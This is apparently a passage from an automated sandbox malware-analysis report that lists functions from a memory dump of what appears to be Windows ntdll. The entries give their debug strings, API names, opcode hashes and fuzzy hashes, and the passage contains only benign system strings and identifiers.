                                                                  • Opcode ID: 809b1923f4606f39b4c44edf54b29cceca993fa926d5e55b4ec2aa06406b1d45
                                                                  • Instruction ID: 834393c829f1fc7432f66cc060002541a35bb9fb75de75d8ffec20124dcf6eac
                                                                  • Opcode Fuzzy Hash: 809b1923f4606f39b4c44edf54b29cceca993fa926d5e55b4ec2aa06406b1d45
                                                                  • Instruction Fuzzy Hash: CC514532A413589FDB04EB68C849BDD77B5BB40708F410965E982BF395CBB0AC85CBA0
                                                                  Function 32D59803 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 179timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: @32$LdrpUnloadNode$Unmapping DLL "%wZ"$df2@32@32$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-4121410990
                                                                  • Opcode ID: 3025c27ccab561a37f00d3f06aff538c87fa14c8e51341c11004c0ec66db20f5
                                                                  • Instruction ID: 2e332e876410655a3e4245016f70168b5a592506de550e11852f1cb8ebc0bc60
                                                                  • Opcode Fuzzy Hash: 3025c27ccab561a37f00d3f06aff538c87fa14c8e51341c11004c0ec66db20f5
                                                                  • Instruction Fuzzy Hash: 865103716043019FEB14EF34C885BA9BBA1BB84314F640A2DE89797784DFF4A845CBE1
                                                                  Function 32D5DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                  • API String ID: 3446177414-3224558752
                                                                  • Opcode ID: 35243a31a0f549c222c8f327d601cf55eac178b9d373f49032fb2a6f5218abf4
                                                                  • Instruction ID: 6fbc5af166c236174eb89e7cb0481fa1c8ee9481dadc12f9f68eb6b6124cf722
                                                                  • Opcode Fuzzy Hash: 35243a31a0f549c222c8f327d601cf55eac178b9d373f49032fb2a6f5218abf4
                                                                  • Instruction Fuzzy Hash: 5A4126B5600B80DFEB01DF24C484B9AB7B5EF45368F208569E8455F791CBB4A8C4CBA1
                                                                  Function 32DDF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 32DDF263
                                                                  • ---------------------------------------, xrefs: 32DDF279
                                                                  • HEAP: , xrefs: 32DDF15D
                                                                  • Entry Heap Size , xrefs: 32DDF26D
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                  • API String ID: 3446177414-1102453626
                                                                  • Opcode ID: ba81863efb51ffd4fbe84e80d2cf76eeda63c1a384a5a5c0c73821e4f1c768ca
                                                                  • Instruction ID: fdb349b3fa5f536796e80ed84c96f2367bc9ef1ce0ebd884de50c3e9f3c3d245
                                                                  • Opcode Fuzzy Hash: ba81863efb51ffd4fbe84e80d2cf76eeda63c1a384a5a5c0c73821e4f1c768ca
                                                                  • Instruction Fuzzy Hash: B041AA3AA01B15DFC704EF18C895A09BBB1FF49358B668469D819EF310CB31EC82CB90
                                                                  Function 32D5DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                  • API String ID: 3446177414-1222099010
                                                                  • Opcode ID: 8d2619338c1662b57ab8a715de40d959eec8f7015603db3391ac42c5bd18ef1f
                                                                  • Instruction ID: 17dacf27f5f490692249af3c7e2193b2da3f6f4612819426c964a55517aab706
                                                                  • Opcode Fuzzy Hash: 8d2619338c1662b57ab8a715de40d959eec8f7015603db3391ac42c5bd18ef1f
                                                                  • Instruction Fuzzy Hash: BA31FF79105784DFF712DB24C805B9A77E4EF05794F108484F8825B7A1CBF9A884CA61
                                                                  Function 32D7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-$0$0
                                                                  • API String ID: 1302938615-699404926
                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction ID: b7626d29d210dda5309980ef30e50abb632df222c87ac74798fe4c413613afff
                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                  • Instruction Fuzzy Hash: 9E81B3B8E053499EEF04CF6CC8917EEBBB1AF45354F54425AD8A0AB390CB3C9941CB60
                                                                  Function 32D39126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$@
                                                                  • API String ID: 3446177414-1194432280
                                                                  • Opcode ID: 78990034683dffd76019e1c0aaa945368d9071011a7c3e4c4fe3b7784784ef98
                                                                  • Instruction ID: a0f841a0726da4c7554bffcfdd6d089a64e39a282e396064dfedf2067ce6112e
                                                                  • Opcode Fuzzy Hash: 78990034683dffd76019e1c0aaa945368d9071011a7c3e4c4fe3b7784784ef98
                                                                  • Instruction Fuzzy Hash: 29813D76D012699BDB61CF54CC45BDEB7B4AF08754F0041DAAA0AB7380DB705E84CFA0
                                                                  Function 32D64D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpFindDllActivationContext, xrefs: 32DA3636, 32DA3662
                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 32DA3640, 32DA366C
                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32DA362F
                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 32DA365C
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                  • API String ID: 3446177414-3779518884
                                                                  • Opcode ID: ab180bc5b8c9be28e96ff29ae5e836301c19ae423d4949654cba7ddd73b47493
                                                                  • Instruction ID: cc3899015b83a359377b4a52ea8f2a80635ba7b7e30cb3aed2517c9b1a4899ac
                                                                  • Opcode Fuzzy Hash: ab180bc5b8c9be28e96ff29ae5e836301c19ae423d4949654cba7ddd73b47493
                                                                  • Instruction Fuzzy Hash: 2C310266D00351AFFB35AA08C848B7A73A4AB0179CFC68566EC4467760DFA09CC4CF95
                                                                  Function 32D5245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • apphelp.dll, xrefs: 32D52462
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D9A9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32D9A992
                                                                  • LdrpDynamicShimModule, xrefs: 32D9A998
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 12c191a8da66e85ef16644f8c5266025e0b944eb9bac7337e52f61b6bac99c67
                                                                  • Instruction ID: c26cbba21aced3d77d86be43128382986c3eacb23ef5393899d7dfabaf52852a
                                                                  • Opcode Fuzzy Hash: 12c191a8da66e85ef16644f8c5266025e0b944eb9bac7337e52f61b6bac99c67
                                                                  • Instruction Fuzzy Hash: EA312676A41301AFEB14AF58C846B9A77B5FB84B44FA20459F902BB350CBB059C6CF90
                                                                  Function 32D5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Re-Waiting, xrefs: 32DA031E
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 32DA02E7
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 32DA02BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                  • API String ID: 0-2474120054
                                                                  • Opcode ID: df489128f1d1f0bccc48945532f910da425d5ebdae7f7a0666bc179e6274f51d
                                                                  • Instruction ID: 277f645846a3657ed30328d7c51dac9eb215223e9b12d30b50d2c3d930a06035
                                                                  • Opcode Fuzzy Hash: df489128f1d1f0bccc48945532f910da425d5ebdae7f7a0666bc179e6274f51d
                                                                  • Instruction Fuzzy Hash: 09E1AC746087419FEB14CF28D890B1AB7E0BF86358F204A69F5A58F3E0DBB4D945CB52
                                                                  Function 32D2F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 3446177414-3610490719
                                                                  • Opcode ID: b6445da24fa2da7d47df375c65992b350892687bad2a8e7350aabd1af1dabfc1
                                                                  • Instruction ID: 0d2b11a4a0173812dc20aef9fd256fd5783ecd1dc28ff6127e200a3561281d40
                                                                  • Opcode Fuzzy Hash: b6445da24fa2da7d47df375c65992b350892687bad2a8e7350aabd1af1dabfc1
                                                                  • Instruction Fuzzy Hash: DE91CF75608741EFE719DB24C884B2EB7A5BF84B48F000959F9819F790DF74A845CBE2
                                                                  Function 32D50BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 32D9A117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 32D9A10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32D9A121
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-161242083
                                                                  • Opcode ID: 3372af14a89100e0fcb7ec22b383c9289a4deacf61b2870cf6179ee0dd605ea2
                                                                  • Instruction ID: 886e8a44b2eecb5a83bfbfe5b9d7ee04f2a12159fb4b3bdfe8a94823d98fa2c0
                                                                  • Opcode Fuzzy Hash: 3372af14a89100e0fcb7ec22b383c9289a4deacf61b2870cf6179ee0dd605ea2
                                                                  • Instruction Fuzzy Hash: 4C71DE75A003059FEB08DF68C981BAEB7F4EB48704F654469E906E7350EBB4A986CB50
                                                                  Function 32D6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 32DA7B8E
                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 32DA7B7F
                                                                  • RTL: Re-Waiting, xrefs: 32DA7BAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 0-871070163
                                                                  • Opcode ID: 4624e4f051776be330c5b881686a234d82d11d1a6c8a40259528479926aa94be
                                                                  • Instruction ID: 2f55ef9e6f4a487af971a6716f1051193da7bf92f9be406629b50a04c516c114
                                                                  • Opcode Fuzzy Hash: 4624e4f051776be330c5b881686a234d82d11d1a6c8a40259528479926aa94be
                                                                  • Instruction Fuzzy Hash: C841E0757017028FE714CE28D850B6AB7E5EF88314F400A2DF99AEB790DB71E805CB91
                                                                  Function 32D6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 32DA728C
                                                                  Strings
                                                                  • RTL: Resource at %p, xrefs: 32DA72A3
                                                                  • RTL: Re-Waiting, xrefs: 32DA72C1
                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 32DA7294
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                  • API String ID: 885266447-605551621
                                                                  • Opcode ID: 1f407519a39d53cb933e71a8d6d9cf9a262b6c04f0a6ecfdf654c48bb1a17601
                                                                  • Instruction ID: 7dc3593aad3574f525fdd8f7ba3a1ad03ffd939f823056182184952a0e289e0f
                                                                  • Opcode Fuzzy Hash: 1f407519a39d53cb933e71a8d6d9cf9a262b6c04f0a6ecfdf654c48bb1a17601
                                                                  • Instruction Fuzzy Hash: B241EF35A00206ABE714CE24DC41F6AB7A5FF94758F508629F995EB740DB30F846CBE1
                                                                  Function 32D5EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eabeb978bbed9d34105f330091cc56c1eae7ac1de55dc54491d7d77ea839033a
                                                                  • Instruction ID: a9b53e9b59ce2caec21b158d94888aee794cdf23eee82e7e0b379bd6544f1b3f
                                                                  • Opcode Fuzzy Hash: eabeb978bbed9d34105f330091cc56c1eae7ac1de55dc54491d7d77ea839033a
                                                                  • Instruction Fuzzy Hash: 52E1CEB5900708DFDF25CFA9C984A8DBBF1BF49354F24456AE985AB360DBB0A841CF50
                                                                  Function 32E0A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: db096ae0555292e68cb39d99f64332a1c3e8d5d8215e49029930db36caa6ccfa
                                                                  • Instruction ID: 16f1d33bf1db61f84b780c0d12f859075f6d88ea0375d6a86438b2d8ae3dcf62
                                                                  • Opcode Fuzzy Hash: db096ae0555292e68cb39d99f64332a1c3e8d5d8215e49029930db36caa6ccfa
                                                                  • Instruction Fuzzy Hash: 32516C7970161A9FEB08CE5AC4A6A1977F1FB89358B11C16DDA06DB710DB70EC4ACF80
                                                                  Function 32D67B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                  • String ID:
                                                                  • API String ID: 4281723722-0
                                                                  • Opcode ID: 8ec18592f57c2be211babd2cbfca6f19717bbb68027b5ae6ee62542741a2f5f0
                                                                  • Instruction ID: e1a707f0ae260061c1ca64e4440d092742a2d49a4722e6becebdba72d6628d79
                                                                  • Opcode Fuzzy Hash: 8ec18592f57c2be211babd2cbfca6f19717bbb68027b5ae6ee62542741a2f5f0
                                                                  • Instruction Fuzzy Hash: E0314675E41228DFDF04EFA8D895A9DBBB0FB48720F11452AE912B7390DB345941CF64
                                                                  Function 32D359C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: b8c956bd9e8e7ed1cc1ea223b506fb5a5192b327dc2ed00e798fbffff0ee16dd
                                                                  • Instruction ID: 51479e46b40550c088e049ae3cd6ef3e5ecaeae98fe91a38f2ff848656243144
                                                                  • Opcode Fuzzy Hash: b8c956bd9e8e7ed1cc1ea223b506fb5a5192b327dc2ed00e798fbffff0ee16dd
                                                                  • Instruction Fuzzy Hash: 5D323774D05369DFEB66CF64C984BD9BBB4BB08304F0081E9D649A7381DBB49A84CF91
                                                                  Function 32D77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldvrm
                                                                  • String ID: +$-
                                                                  • API String ID: 1302938615-2137968064
                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction ID: d3096683544e7b2163aefc164d2f2d6b82db527038a6259b83fbb3425d40ff90
                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                  • Instruction Fuzzy Hash: EF91B4B4E002169FFB14CE6DD9817AEB7A5EF44765F604A1AEC54EB3C0DB788940C760
                                                                  Function 32D64C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
